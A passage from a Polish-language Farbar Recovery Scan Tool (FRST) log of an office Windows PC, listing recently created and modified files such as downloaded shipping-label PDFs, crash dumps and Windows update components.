000916460 _____ C:\WINDOWS\Minidump\012721-4078-01.dmp 2021-01-27 08:22 - 2021-01-27 10:38 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird 2021-01-26 10:26 - 2021-01-26 10:26 - 000077676 _____ C:\Users\Biuro 1\Downloads\etykieta_23215108721.pdf 2021-01-26 08:23 - 2021-01-26 08:24 - 001212028 _____ C:\WINDOWS\Minidump\012621-8328-01.dmp 2021-01-22 15:03 - 2021-01-22 15:03 - 000013742 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_22012021_150314.pdf 2021-01-22 15:02 - 2021-01-22 15:02 - 000013919 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_22012021_150250.pdf 2021-01-22 14:20 - 2021-01-22 14:20 - 001063956 _____ C:\WINDOWS\Minidump\012221-4359-01.dmp 2021-01-22 12:39 - 2021-01-22 12:39 - 000077306 _____ C:\Users\Biuro 1\Downloads\etykieta_23207010527.pdf 2021-01-22 11:59 - 2021-01-22 11:59 - 000078524 _____ C:\Users\Biuro 1\Downloads\etykieta_23206816132.pdf 2021-01-22 09:36 - 2021-01-22 09:36 - 000077205 _____ C:\Users\Biuro 1\Downloads\etykieta_23206154733.pdf 2021-01-22 08:00 - 2021-01-22 08:00 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools 2021-01-21 11:26 - 2021-01-21 11:26 - 000937404 _____ C:\WINDOWS\Minidump\012121-5984-01.dmp 2021-01-20 13:38 - 2021-01-20 13:38 - 000992364 _____ C:\WINDOWS\Minidump\012021-4062-01.dmp 2021-01-20 13:32 - 2021-01-20 13:32 - 000013909 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_20012021_133248.pdf 2021-01-20 13:16 - 2021-01-20 13:16 - 000077770 _____ C:\Users\Biuro 1\Downloads\etykieta_23192390712 (1).pdf 2021-01-20 12:29 - 2021-01-20 12:29 - 000013799 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_20012021_122945.pdf 2021-01-20 12:13 - 2021-01-20 12:22 - 000000000 ____D C:\Users\Biuro 1\Desktop\Maptiv Meknes 20.01.2021 2021-01-19 13:25 - 2021-01-19 13:25 - 000179191 _____ C:\Users\Biuro 1\Downloads\1102702228.pdf 2021-01-18 14:45 - 2021-01-18 14:45 - 000013543 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_18012021_144547.pdf 2021-01-18 14:44 - 2021-01-18 14:44 - 000013743 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_18012021_144425.pdf 2021-01-18 11:32 - 2021-01-18 11:32 - 000077434 _____ C:\Users\Biuro 1\Downloads\etykieta_23192390712.pdf 2021-01-15 14:51 - 2021-01-15 14:51 - 000013639 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_15012021_145110.pdf 2021-01-15 14:15 - 2021-01-15 14:15 - 000014035 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_15012021_141559.pdf 2021-01-15 14:10 - 2021-01-15 14:10 - 000013911 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_15012021_141045.pdf 2021-01-15 13:57 - 2021-01-15 13:57 - 000014047 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_15012021_135740.pdf 2021-01-15 13:53 - 2021-01-15 13:53 - 000013913 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_15012021_135312.pdf 2021-01-15 12:57 - 2021-01-15 12:57 - 000013896 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_15012021_125757.pdf 2021-01-15 12:56 - 2021-01-15 12:56 - 000013771 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_15012021_125628.pdf 2021-01-15 12:37 - 2021-01-15 12:37 - 000014022 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_15012021_123723.pdf 2021-01-15 12:19 - 2021-01-15 12:19 - 000013764 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_15012021_121945.pdf 2021-01-15 12:16 - 2021-01-15 12:16 - 000013793 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_15012021_121624.pdf 2021-01-15 11:33 - 2021-01-15 11:33 - 000077413 _____ C:\Users\Biuro 1\Downloads\etykieta_23187222298.pdf 2021-01-14 13:21 - 2021-01-14 13:21 - 000078034 _____ C:\Users\Biuro 1\Downloads\etykieta_23184507869.pdf 2021-01-14 11:25 - 2021-01-14 11:25 - 000077294 _____ C:\Users\Biuro 1\Downloads\etykieta_23183854723.pdf 2021-01-14 11:22 - 2021-01-14 11:22 - 000077668 _____ C:\Users\Biuro 1\Downloads\etykieta_23183839535.pdf 2021-01-14 10:37 - 2021-01-14 10:38 - 000078199 _____ C:\Users\Biuro 1\Downloads\etykieta_23183598857.pdf 2021-01-14 07:57 - 2021-01-14 07:57 - 000923548 _____ C:\WINDOWS\Minidump\011421-4875-01.dmp 2021-01-13 14:29 - 2021-01-13 14:29 - 000709900 _____ C:\WINDOWS\Minidump\011321-4390-01.dmp 2021-01-13 12:17 - 2021-01-13 12:17 - 000013609 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_13012021_121730.pdf 2021-01-13 12:17 - 2021-01-13 12:17 - 000013609 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_13012021_121727.pdf 2021-01-13 12:12 - 2021-01-13 12:12 - 000013647 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_13012021_121212.pdf 2021-01-13 12:07 - 2021-01-13 12:07 - 000013740 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_13012021_120734.pdf 2021-01-13 08:32 - 2021-01-13 08:32 - 000559292 _____ C:\WINDOWS\Minidump\011321-4531-01.dmp 2021-01-13 08:29 - 2021-01-13 08:29 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx 2021-01-13 08:29 - 2021-01-13 08:29 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl 2021-01-13 08:29 - 2021-01-13 08:29 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr 2021-01-13 08:29 - 2021-01-13 08:29 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx 2021-01-13 08:29 - 2021-01-13 08:29 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr 2021-01-13 08:29 - 2021-01-13 08:29 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl 2021-01-13 08:29 - 2021-01-13 08:29 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll 2021-01-13 08:29 - 2021-01-13 08:29 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax 2021-01-13 08:29 - 2021-01-13 08:29 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax 2021-01-13 08:29 - 2021-01-13 08:29 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl 2021-01-13 08:29 - 2021-01-13 08:29 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax 2021-01-13 08:29 - 2021-01-13 08:29 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll 2021-01-13 08:29 - 2021-01-13 08:29 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll 2021-01-13 08:29 - 2021-01-13 08:29 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax 2021-01-13 08:29 - 2021-01-13 08:29 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll 2021-01-13 08:29 - 2021-01-13 08:29 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll 2021-01-13 08:29 - 2021-01-13 08:29 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx 2021-01-13 08:29 - 2021-01-13 08:29 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl 2021-01-13 08:29 - 2021-01-13 08:29 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx 2021-01-13 08:29 - 2021-01-13 08:29 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl 2021-01-13 08:29 - 2021-01-13 08:29 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll 2021-01-13 08:29 - 2021-01-13 08:29 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll 2021-01-13 08:29 - 2021-01-13 08:29 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim 2021-01-13 08:28 - 2021-01-13 08:28 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll 2021-01-13 08:28 - 2021-01-13 08:28 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll 2021-01-13 08:28 - 2021-01-13 08:28 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll 2021-01-13 08:28 - 2021-01-13 08:28 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE 2021-01-13 08:28 - 2021-01-13 08:28 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll 2021-01-13 08:28 - 2021-01-13 08:28 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl 2021-01-13 08:28 - 2021-01-13 08:28 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll 2021-01-13 08:28 - 2021-01-13 08:28 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl 2021-01-13 08:28 - 2021-01-13 08:28 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv 2021-01-13 08:28 - 2021-01-13 08:28 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll 2021-01-13 08:28 - 2021-01-13 08:28 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll 2021-01-13 08:28 - 2021-01-13 08:28 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl 2021-01-13 08:28 - 2021-01-13 08:28 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll 2021-01-13 08:28 - 2021-01-13 08:28 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll 2021-01-13 08:28 - 2021-01-13 08:28 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl 2021-01-13 08:28 - 2021-01-13 08:28 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe 2021-01-13 08:27 - 2021-01-13 08:27 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv 2021-01-13 08:27 - 2021-01-13 08:27 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll 2021-01-13 08:27 - 2021-01-13 08:27 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl 2021-01-13 08:27 - 2021-01-13 08:27 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe 2021-01-13 08:27 - 2021-01-13 08:27 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll 2021-01-13 08:17 - 2021-01-13 08:17 - 000680724 _____ C:\WINDOWS\Minidump\011321-5968-01.dmp 2021-01-13 08:10 - 2021-01-13 08:10 - 001155780 _____ C:\WINDOWS\Minidump\011321-5437-01.dmp 2021-01-12 12:43 - 2021-01-12 12:43 - 000013728 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_12012021_124317.pdf 2021-01-11 12:22 - 2021-01-11 12:22 - 000014016 _____ C:\Users\Biuro 1\Downloads\operationHistoryForm_11012021_122218.pdf 2021-01-11 11:23 - 2021-01-11 11:23 - 000077300 _____ C:\Users\Biuro 1\Downloads\etykieta_23172564314.pdf 2021-01-11 10:51 - 2021-01-11 10:51 - 000077416 _____ C:\Users\Biuro 1\Downloads\etykieta_23172356576.pdf 2021-01-08 08:45 - 2021-01-08 08:45 - 000090363 _____ C:\Users\Biuro 1\Downloads\etykieta_23166438974.pdf 2021-01-07 09:12 - 2021-01-07 09:12 - 000179040 _____ C:\Users\Biuro 1\Downloads\1102655941.pdf ==================== Jeden miesiąc (zmodyfikowane) ================== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2021-01-30 13:13 - 2020-08-20 15:55 - 000000000 ____D C:\FRST 2021-01-30 13:09 - 2017-05-30 13:25 - 000000000 ____D C:\Users\Biuro 1\AppData\LocalLow\Mozilla 2021-01-30 13:09 - 2016-01-21 14:41 - 000001170 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk 2021-01-30 13:09 - 2015-05-23 12:36 - 000000000 ____D C:\ProgramData\Mozilla 2021-01-30 13:08 - 2020-07-24 13:58 - 002003094 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2021-01-30 13:08 - 2019-12-07 16:09 - 000856206 _____ C:\WINDOWS\system32\perfh015.dat 2021-01-30 13:08 - 2019-12-07 16:09 - 000182216 _____ C:\WINDOWS\system32\perfc015.dat 2021-01-30 13:08 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF 2021-01-30 13:04 - 2020-08-21 08:45 - 641213549 _____ C:\WINDOWS\MEMORY.DMP 2021-01-30 13:04 - 2020-07-27 12:39 - 000000000 ____D C:\WINDOWS\Minidump 2021-01-30 13:04 - 2020-07-24 14:00 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2021-01-30 13:04 - 2020-07-24 13:54 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2021-01-30 13:04 - 2020-07-23 08:25 - 000000000 ____D C:\Users\Biuro 1 2021-01-30 13:04 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2021-01-30 13:04 - 2019-07-04 14:54 - 000000000 ___RD C:\Users\Biuro 1\OneDrive - P.P.U. ESPA Paweł Szumski 2021-01-30 12:49 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI 2021-01-30 12:39 - 2020-07-24 14:00 - 000018873 _____ C:\WINDOWS\diagwrn.xml 2021-01-30 12:39 - 2020-07-24 14:00 - 000018873 _____ C:\WINDOWS\diagerr.xml 2021-01-30 12:39 - 2016-07-27 18:19 - 000008192 __RSH C:\BOOTSECT.BAK 2021-01-30 12:38 - 2016-07-27 18:19 - 000000001 ___SH C:\BOOTNXT 2021-01-30 12:37 - 2019-12-07 10:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM 2021-01-30 12:36 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps 2021-01-30 12:36 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness 2021-01-30 12:34 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\registration 2021-01-30 12:31 - 2020-07-23 07:14 - 000000000 ___DC C:\WINDOWS\Panther 2021-01-30 12:27 - 2020-06-08 06:47 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2021-01-30 12:27 - 2020-06-08 06:47 - 000002276 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk 2021-01-30 12:27 - 2015-05-18 12:36 - 000002314 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2021-01-30 12:27 - 2015-05-18 12:36 - 000002273 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2021-01-29 12:13 - 2016-07-28 06:40 - 000000000 ____D C:\Users\Biuro 1\AppData\Local\Packages 2021-01-29 11:21 - 2015-05-29 13:57 - 000000000 ____D C:\ProgramData\boost_interprocess 2021-01-29 09:05 - 2015-05-23 12:46 - 000000000 ____D C:\Users\Biuro 1\AppData\Roaming\FAKT95 2021-01-28 08:26 - 2020-02-04 08:16 - 000002431 _____ C:\Users\Biuro 1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams.lnk 2021-01-28 08:26 - 2019-07-04 16:26 - 000002423 _____ C:\Users\Biuro 1\Desktop\Microsoft Teams.lnk 2021-01-27 10:38 - 2015-05-23 12:36 - 000001289 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk 2021-01-26 08:39 - 2015-05-23 14:28 - 000000000 ____D C:\Program Files\Microsoft Office 2021-01-22 07:58 - 2010-11-21 04:27 - 000799104 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe 2021-01-20 07:55 - 2020-07-24 14:00 - 000003510 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA 2021-01-20 07:55 - 2020-07-24 14:00 - 000003386 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore 2021-01-18 15:14 - 2020-07-24 13:54 - 000444464 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2021-01-18 15:13 - 2019-12-07 16:12 - 000000000 ____D C:\Program Files\Windows Photo Viewer 2021-01-18 15:13 - 2019-12-07 16:12 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection 2021-01-18 15:13 - 2019-12-07 16:12 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\inetsrv 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr 2021-01-18 15:13 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender 2021-01-14 08:05 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp 2021-01-14 07:57 - 2015-05-23 12:36 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2021-01-13 08:28 - 2015-05-08 18:08 - 000413698 __RSH C:\bootmgr 2021-01-13 08:27 - 2020-07-24 13:55 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll 2021-01-13 08:05 - 2015-05-13 09:43 - 000000000 ____D C:\WINDOWS\system32\MRT 2021-01-13 08:02 - 2015-05-13 09:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2021-01-08 15:23 - 2015-05-23 13:48 - 000000000 ____D C:\Users\Biuro 1\Documents\My Labels 2021-01-08 08:30 - 2020-09-03 07:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools ==================== Pliki w katalogu głównym wybranych folderów ======== 2015-05-23 14:51 - 2015-05-23 14:51 - 000000000 _____ () C:\Users\Biuro 1\AppData\Roaming\gdfw.log 2015-05-23 14:51 - 2015-05-23 14:51 - 000000779 _____ () C:\Users\Biuro 1\AppData\Roaming\gdscan.log 2020-08-20 14:27 - 2020-08-20 14:27 - 000007605 _____ () C:\Users\Biuro 1\AppData\Local\Resmon.ResmonCfg ==================== SigCheck ============================ (Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.) ==================== Koniec FRST.txt ========================